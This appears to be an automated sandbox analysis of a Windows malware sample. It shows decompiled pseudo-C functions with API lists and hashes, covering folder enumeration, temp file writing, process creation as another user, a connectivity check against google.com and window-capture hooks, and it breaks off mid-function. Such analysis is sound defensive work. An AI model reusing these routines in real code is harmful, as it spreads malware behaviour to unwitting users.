    • Instruction ID: b6791355fd1749a83a1555bb70c97dc8a4c93dd76365ea166b4ad98bbf6705a2
    • Opcode Fuzzy Hash: e9cf2db2014f4d433e1b7766319a2c2461d1af58fd5dc9081ef01596ad424dd1
    • Instruction Fuzzy Hash: 7F11AC72A01228BADB20EA92CC09FDF7E7CEF41704F00406AB505B6180D7785B86CBE9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040C2EE(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v60;
    				char _v580;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v60;
    				E0040FA33(0x95, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E0041645B( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v580;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0041BAD3( &_v580,  &_v16, _t37, 1, 2, E0040C05F,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E004163A8(_v12);
    				}
    				return E004099E1(_t29, _v12, 0xcb);
    			}

    0x0040c2f9
    0x0040c301
    0x0040c30a
    0x0040c314
    0x0040c31b
    0x0040c322
    0x0040c329
    0x0040c32e
    0x0040c330
    0x0040c330
    0x0040c33e
    0x0040c344
    0x0040c346
    0x0040c358
    0x0040c361
    0x0040c361
    0x0040c366
    0x0040c367
    0x0040c36f
    0x00000000
    0x0040c388
    0x00000000

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040C33E
      • Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
      • Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
      • Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
      • Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
      • Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
      • Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 5abc9aa9167cca482c70a6cd3d33257a8d948ee1b4a8fec2a9f9004c905f12d6
    • Instruction ID: b49838674b3f9f7e34098b345eba56dc5e0dbb9a57ec041c7834b58789755f18
    • Opcode Fuzzy Hash: 5abc9aa9167cca482c70a6cd3d33257a8d948ee1b4a8fec2a9f9004c905f12d6
    • Instruction Fuzzy Hash: 7311A071A01218BADB209BA2CC49FDF7F78EF41344F00416AFA08B6180D3785A86CBE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0040F3C2(void* __eflags) {
    				signed int _v8;
    				char _v20;
    				char _v44;
    				char _v92;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				CHAR* _t27;
    				intOrPtr* _t28;
    				WCHAR* _t30;
    				struct HINSTANCE__* _t31;
    
    				_t30 =  &_v44;
    				E0040FA33(0xe3, _t30);
    				_t31 = GetModuleHandleW(_t30);
    				if(_t31 != 0) {
    					_t27 =  &_v20;
    					E0040F9FD(0xe4, _t27);
    					_t28 = GetProcAddress(_t31, _t27);
    					if(_t28 == 0) {
    						L4:
    						_t17 = 0;
    						L6:
    						return _t17;
    					}
    					_v8 = _v8 & 0x00000000;
    					_t32 =  &_v92;
    					E0040FA33(0xd5,  &_v92);
    					_push(0x1e6);
    					_push("0x85F95371");
    					if(E00417116( &_v8, _t32, 0x2030309) > 0) {
    						 *_t28(0, _v8, "#", 0x10040);
    						E004163A8(_v8);
    						_t17 = 1;
    						goto L6;
    					}
    					goto L4;
    				}
    				return 0;
    			}

    0x0040f3c9
    0x0040f3d1
    0x0040f3df
    0x0040f3e3
    0x0040f3ea
    0x0040f3f2
    0x0040f401
    0x0040f405
    0x0040f43a
    0x0040f43a
    0x0040f459
    0x00000000
    0x0040f459
    0x0040f407
    0x0040f40b
    0x0040f413
    0x0040f418
    0x0040f41d
    0x0040f438
    0x0040f44d
    0x0040f452
    0x0040f457
    0x00000000
    0x0040f457
    0x00000000
    0x0040f438
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 0040F3D9
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040F3FB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0x85F95371
    • API String ID: 1646373207-960530796
    • Opcode ID: 45fd4183ed262cce335441611f2d7a53839e3b189bab5d08064a6466cd9918eb
    • Instruction ID: 2c4aec6a6e97a14a58b638e8e9cc922513be60d66295b1727d988128ee1a738c
    • Opcode Fuzzy Hash: 45fd4183ed262cce335441611f2d7a53839e3b189bab5d08064a6466cd9918eb
    • Instruction Fuzzy Hash: 6B01D276A00304B7DB2166AA8C06BDF3B6C9F54715F100032BE01F7281DA7C9E0A96A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F0DC(void* __ecx, WCHAR* __edi, signed int _a4) {
    				char _v108;
    				char _v158;
    				char _v178;
    				char _v198;
    				char _v596;
    				void* __esi;
    				signed int _t12;
    				int _t14;
    				WCHAR* _t16;
    				char* _t18;
    				WCHAR* _t19;
    
    				_t19 = __edi;
    				 *__edi = 0;
    				E0040F087(__ecx,  &_v596);
    				_t12 = _a4;
    				if(_t12 == 0) {
    					L6:
    					_t18 =  &_v178;
    					goto L7;
    				} else {
    					_t12 = _t12 - 1;
    					if(_t12 == 0) {
    						_t18 =  &_v198;
    						L7:
    						_t16 = 0x422bf8;
    						goto L8;
    					} else {
    						_t12 = _t12 - 1;
    						if(_t12 == 0) {
    							goto L6;
    						} else {
    							_t14 = _t12 - 1;
    							if(_t14 == 0) {
    								_t16 = L"SOFTWARE\\Microsoft";
    								_t18 =  &_v158;
    								L8:
    								_t21 =  &_v108;
    								_t14 = E004165B3(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
    								if(_t14 != 0) {
    									_t14 = E0041BC2F(_t21, _t19, _t16);
    									if(_t14 == 0) {
    										L12:
    										_t14 = 0;
    										 *_t19 = 0;
    									} else {
    										if(_a4 == 0) {
    											_t14 = PathRenameExtensionW(_t19, L".dat");
    											if(_t14 == 0) {
    												goto L12;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t14;
    			}

    0x0040f0dc
    0x0040f0e8
    0x0040f0f3
    0x0040f0fb
    0x0040f0fe
    0x0040f11e
    0x0040f11e
    0x00000000
    0x0040f100
    0x0040f100
    0x0040f101
    0x0040f116
    0x0040f124
    0x0040f124
    0x00000000
    0x0040f103
    0x0040f103
    0x0040f104
    0x00000000
    0x0040f106
    0x0040f106
    0x0040f107
    0x0040f109
    0x0040f10e
    0x0040f129
    0x0040f12d
    0x0040f133
    0x0040f13a
    0x0040f140
    0x0040f147
    0x0040f15f
    0x0040f15f
    0x0040f161
    0x0040f149
    0x0040f14d
    0x0040f155
    0x0040f15d
    0x00000000
    0x00000000
    0x0040f15d
    0x0040f14d
    0x0040f147
    0x0040f13a
    0x0040f107
    0x0040f104
    0x0040f101
    0x0040f167

    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3337224433-47915998
    • Opcode ID: 05460d29cc74dfb41fb042ec830e7dc2197ac92e56a501720f75ed58250722e5
    • Instruction ID: 524dbb4b9b3c9cf92cf8b1b34ef6c829f40de377c6f03678f51c86ae64102546
    • Opcode Fuzzy Hash: 05460d29cc74dfb41fb042ec830e7dc2197ac92e56a501720f75ed58250722e5
    • Instruction Fuzzy Hash: F1019E30200249DADB30DFB4DD81BAB7768AF50744F400077A804FAAC2EB7C9E89C65D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0041B726(intOrPtr _a4, intOrPtr _a8) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t12;
    				void* _t20;
    				void* _t21;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t20 = 0;
    				while(1) {
    					_push(_a4);
    					_push(E004176E1());
    					_push(L"tmp");
    					_t19 =  &_v1044;
    					_t12 = E0041709B(_t11, 0x104,  &_v1044, L"%s%08x.%s");
    					_t21 = _t21 + 0x10;
    					if(_t12 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0041BC2F(_t19, _a8,  &_v524) == 0 || E0041B55A(_a8, 0, 0) == 0) {
    						_t20 = _t20 + 1;
    						if(_t20 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    0x0041b749
    0x0041b7a3
    0x00000000
    0x0041b7a3
    0x0041b74b
    0x0041b74d
    0x0041b74d
    0x0041b755
    0x0041b756
    0x0041b765
    0x0041b76b
    0x0041b770
    0x0041b776
    0x00000000
    0x00000000
    0x0041b78b
    0x0041b79d
    0x0041b7a1
    0x00000000
    0x00000000
    0x00000000
    0x0041b7ab
    0x00000000
    0x0041b7ab
    0x0041b78b
    0x00000000

    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 0041B73D
      • Part of subcall function 004176E1: GetTickCount.KERNEL32 ref: 004176E1
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
      • Part of subcall function 0041B55A: CreateFileW.KERNEL32(00417E82,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B574
      • Part of subcall function 0041B55A: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B597
      • Part of subcall function 0041B55A: CloseHandle.KERNEL32(00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B5A4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
    • String ID: %s%08x.%s$tmp
    • API String ID: 3395140874-234517578
    • Opcode ID: d84ea48bf93bd4930a4ada96dd8f159c93e1a8a3c6a2390d9282f01d52e3d154
    • Instruction ID: 7a9c6a3ae2567589a0f8b7426347b3b8141538163db6cddad3cb4511e9047f55
    • Opcode Fuzzy Hash: d84ea48bf93bd4930a4ada96dd8f159c93e1a8a3c6a2390d9282f01d52e3d154
    • Instruction Fuzzy Hash: 7E01217520021826DE207A248C42BEF7B29DB81724F104163BA38B61E2D3799DC696EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419F7C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t17;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041B705( &_v524) != 0) {
    					_t17 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E00416527(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
    					E004163E4(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}

    0x00419f90
    0x00419fa6
    0x00419fc0
    0x00419fc6
    0x00419fda
    0x00419fe7
    0x00419fee
    0x00419ff2
    0x00419ff3
    0x00419ff8

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00419F9E
      • Part of subcall function 0041B705: SetFileAttributesW.KERNEL32(00000080,00000080,00412A4A,?), ref: 0041B70E
      • Part of subcall function 0041B705: DeleteFileW.KERNEL32(?), ref: 0041B718
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00419FC0
      • Part of subcall function 00416527: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0041721F,00000000,00000000,00000000,00416584,00000000,00000000,00000000,?,00000000), ref: 00416542
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: dd038b7120de620845e41004600d132d5439a9503dcaa77f29b39c42d9a56458
    • Instruction ID: c3e3754a15664b6fca87ae107449a35a5bcee2109c5d7cebc48e3d15ac3e2768
    • Opcode Fuzzy Hash: dd038b7120de620845e41004600d132d5439a9503dcaa77f29b39c42d9a56458
    • Instruction Fuzzy Hash: 4201A772A0021467CB509B788C49FCB77ACAF49714F000256B964E31D1D778DA45CA94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00408E58(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
    				void* _t13;
    				void** _t24;
    				void* _t27;
    
    				_t13 = _a4(_a8,  &_a8);
    				if(_t13 != 0) {
    					_t24 = E00419A97(__ecx, _a8);
    					if(_t24 != 0) {
    						if(EqualSid( *_t24, _a12) != 0) {
    							_t27 = _a8;
    							if(E00417116( &_a4, L"\"%s\"", _a16) > 0) {
    								E00417CCA(_t27, _a4);
    								E004163A8(_a4);
    							}
    						}
    						E004163A8(_t24);
    					}
    					return CloseHandle(_a8);
    				}
    				return _t13;
    			}

    0x00408e62
    0x00408e67
    0x00408e72
    0x00408e76
    0x00408e85
    0x00408e8b
    0x00408ea1
    0x00408ea7
    0x00408eaf
    0x00408eaf
    0x00408eb4
    0x00408eb6
    0x00408eb6
    0x00000000
    0x00408ec4
    0x00408ec6

    APIs
      • Part of subcall function 00419A97: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8), ref: 00419AB0
      • Part of subcall function 00419A97: GetLastError.KERNEL32(?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8,?,?,00000000), ref: 00419AB6
      • Part of subcall function 00419A97: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,004179E1,?,?,?,0040EBDD,000000FF,00422BA8), ref: 00419ADC
    • EqualSid.ADVAPI32(00000000,0000000C,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408E7D
      • Part of subcall function 00417CCA: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417CDB
      • Part of subcall function 00417CCA: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417CFA
      • Part of subcall function 00417CCA: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D06
      • Part of subcall function 00417CCA: CreateProcessAsUserW.ADVAPI32(?,00000000,00408EAC,00000000,00000000,00000000,00408EAC,00408EAC,00000000,?,?,?,00000000,00000044), ref: 00417D77
      • Part of subcall function 00417CCA: CloseHandle.KERNEL32(?), ref: 00417D8A
      • Part of subcall function 00417CCA: CloseHandle.KERNEL32(?), ref: 00417D8F
      • Part of subcall function 00417CCA: FreeLibrary.KERNEL32(?), ref: 00417DA6
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • CloseHandle.KERNEL32(?,?,00408FD1,?,00408FB2,00408FD1,?,?,?), ref: 00408EBE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
    • String ID: "%s"
    • API String ID: 4035272744-3297466227
    • Opcode ID: 29b37e82c76b53d98318989807cb1815507dee5ffd80459c7e2cd128c638c456
    • Instruction ID: e4e8888d62a4b4eaf59fb1bb3ca4a808ae7bb83b7311024303ee22fdb54593a3
    • Opcode Fuzzy Hash: 29b37e82c76b53d98318989807cb1815507dee5ffd80459c7e2cd128c638c456
    • Instruction Fuzzy Hash: 90F0FF36500109BBCF116F61DD05DDF3F69AF80355B04843ABC18E5161DB35DA50A698
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00418471(intOrPtr __eax, void* __eflags) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				void* __edi;
    				intOrPtr _t26;
    
    				_t26 = 0;
    				_v56 = 0x101;
    				_v52 = 0;
    				_v48 = __eax;
    				_v44 = E004183F0();
    				_v40 = "http://www.google.com/webhp";
    				_v36 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0x80000;
    				_v12 = 0;
    				_v8 = GetTickCount();
    				if(E004182BE( &_v56, 0) != 0) {
    					_t26 = GetTickCount() - _v8;
    				}
    				E004163A8(_v44);
    				return _t26;
    			}

    0x00418479
    0x0041847c
    0x00418482
    0x00418485
    0x00418493
    0x00418496
    0x0041849d
    0x004184a0
    0x004184a3
    0x004184a6
    0x004184a9
    0x004184ac
    0x004184b3
    0x004184bc
    0x004184c6
    0x004184cc
    0x004184cc
    0x004184d2
    0x004184dd

    APIs
      • Part of subcall function 004183F0: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00418401
      • Part of subcall function 004183F0: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00418414
      • Part of subcall function 004183F0: FreeLibrary.KERNEL32(?), ref: 00418466
    • GetTickCount.KERNEL32 ref: 004184B6
      • Part of subcall function 004182BE: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00418312
      • Part of subcall function 004182BE: InternetCloseHandle.WININET(00000000), ref: 004183AB
    • GetTickCount.KERNEL32 ref: 004184C8
    Strings
    • http://www.google.com/webhp, xrefs: 00418496
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 2673491915-2670330958
    • Opcode ID: 74262471973db98e606bb4830f26b245f4106950790f89dff2424101421d910e
    • Instruction ID: bba17d28731afb945edc1d2094b4380ce1b639f023a30912cec58d7fa11476b9
    • Opcode Fuzzy Hash: 74262471973db98e606bb4830f26b245f4106950790f89dff2424101421d910e
    • Instruction Fuzzy Hash: D201D6B1D1122CAACF00EFE9D9444CEFBB8AF48748F10415BE810B7211D7B85A448BD9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GetCurrentThreadId.KERNEL32 ref: 0040D719
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D723
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Thread$CurrentObjectProcessSingleWaitWindow
    • String ID: (B
    • API String ID: 419583955-566106762
    • Opcode ID: 7391d2eaaf0ad22ba1fe50c203308436ca8d8d024ab89ae85fec78b8dd99efe1
    • Instruction ID: 697024baf9868a06d5c65cae8a446c3be7c000f530ecc04265a5566f9d34419d
    • Opcode Fuzzy Hash: 7391d2eaaf0ad22ba1fe50c203308436ca8d8d024ab89ae85fec78b8dd99efe1
    • Instruction Fuzzy Hash: EAF0A722A0113076C7305BEABDCC89B9F58D9853F53544537F208F7251D238480AC6FD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D790(void* __eax) {
    				void* __ebx;
    				long _t8;
    				intOrPtr _t16;
    				struct HWND__* _t19;
    
    				if(__eax + 0x422bee == 0 || E0040EEE1() == 0) {
    					return GetCapture();
    				}
    				_t8 = GetCurrentThreadId();
    				_t16 =  *0x4228f0; // 0x0
    				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
    					L6:
    					return 0;
    				} else {
    					_t19 =  *(_t16 + 0x108);
    					if(_t19 == 0 || IsWindow(_t19) != 0) {
    						return _t19;
    					} else {
    						E0040CE22(0, 0x4228e0, _t11, _t11, _t11);
    						goto L6;
    					}
    				}
    			}

    0x0040d797
    0x0040d7e5
    0x0040d7e5
    0x0040d7a2
    0x0040d7a8
    0x0040d7b4
    0x0040d7dc
    0x0040d7df
    0x0040d7b6
    0x0040d7b6
    0x0040d7be
    0x0040d7e3
    0x0040d7cb
    0x0040d7d6
    0x00000000
    0x0040d7db
    0x0040d7be

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GetCurrentThreadId.KERNEL32 ref: 0040D7A2
    • IsWindow.USER32(?), ref: 0040D7C1
      • Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
      • Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
      • Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
      • Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
    • String ID: (B
    • API String ID: 904989000-566106762
    • Opcode ID: d9f55aad8d3e92063058ebf0194ec856d7ed529a9148087e655d913b7a67b2e2
    • Instruction ID: ed004b84c8fe7465209c114a58235bce5a9697f7aad2850445c4cde6a3a9da62
    • Opcode Fuzzy Hash: d9f55aad8d3e92063058ebf0194ec856d7ed529a9148087e655d913b7a67b2e2
    • Instruction Fuzzy Hash: B7F0E532B001209FD610AFE5BE846E7B318EB04359349407BF808FB3A1D2B99C468A9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D740(void* __eax, void* __ecx) {
    				void* __ebx;
    				void* __esi;
    				long _t7;
    				intOrPtr _t18;
    
    				if(E0040EEE1() == 0) {
    					return ReleaseCapture();
    				}
    				_t7 = GetCurrentThreadId();
    				_t18 =  *0x4228f0; // 0x0
    				if( *((intOrPtr*)(_t18 + 0x10c)) != _t7) {
    					SetLastError(5);
    					return 0;
    				} else {
    					E0040CE22(0, 0x4228e0, 0, 0, 0);
    					return 1;
    				}
    			}

    0x0040d74f
    0x0040d789
    0x0040d789
    0x0040d751
    0x0040d757
    0x0040d763
    0x0040d780
    0x0040d788
    0x0040d765
    0x0040d773
    0x0040d77d
    0x0040d77d

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GetCurrentThreadId.KERNEL32 ref: 0040D751
    • SetLastError.KERNEL32(00000005), ref: 0040D780
      • Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
      • Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
      • Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
      • Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
    • String ID: (B
    • API String ID: 2244431463-566106762
    • Opcode ID: 9c7b7b7bb0a45b2280571868715cc8538d72ca15d566773adfb871082ef18d41
    • Instruction ID: de8f5a68a8e8cab295cd0fd9ec70609a6493216c43b0d319137a207753e2337d
    • Opcode Fuzzy Hash: 9c7b7b7bb0a45b2280571868715cc8538d72ca15d566773adfb871082ef18d41
    • Instruction Fuzzy Hash: 26E020B1600214AFE700BFF1AE80AB3234DF75030AB4048BEF906F6291D7798C058D5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040C05F(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				char _v524;
    				char _v576;
    				char _v580;
    				char _v588;
    				intOrPtr _v608;
    				char _v612;
    				char _v620;
    				char _v628;
    				char _v632;
    				char* _v640;
    				signed int _v644;
    				char* _v648;
    				char** _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				char* _v664;
    				char* _v668;
    				char* _v672;
    				char* _v676;
    				void* __edi;
    				void* __esi;
    				signed int _t82;
    				char* _t83;
    				intOrPtr _t85;
    				char** _t101;
    				char* _t112;
    				char* _t121;
    				char* _t122;
    				void* _t123;
    				char* _t126;
    				char* _t127;
    				char* _t156;
    				void* _t157;
    				signed int _t166;
    				char* _t167;
    				char** _t168;
    				intOrPtr _t170;
    				char* _t171;
    				signed int _t172;
    				void* _t174;
    
    				_t174 = (_t172 & 0xfffffff8) - 0x294;
    				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L31:
    					return 1;
    				}
    				_t177 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_push( &_v524);
    					_t82 = 2;
    					_t83 = E0041B5BF(_t82,  &_v524,  &_v612);
    					__eflags = _t83;
    					if(_t83 == 0) {
    						goto L31;
    					}
    					_t85 = E00416C43(_v608,  &_v652, _v612, 1, 0);
    					_v660 = _t85;
    					__eflags = _t85 - 0xffffffff;
    					if(_t85 == 0xffffffff) {
    						L30:
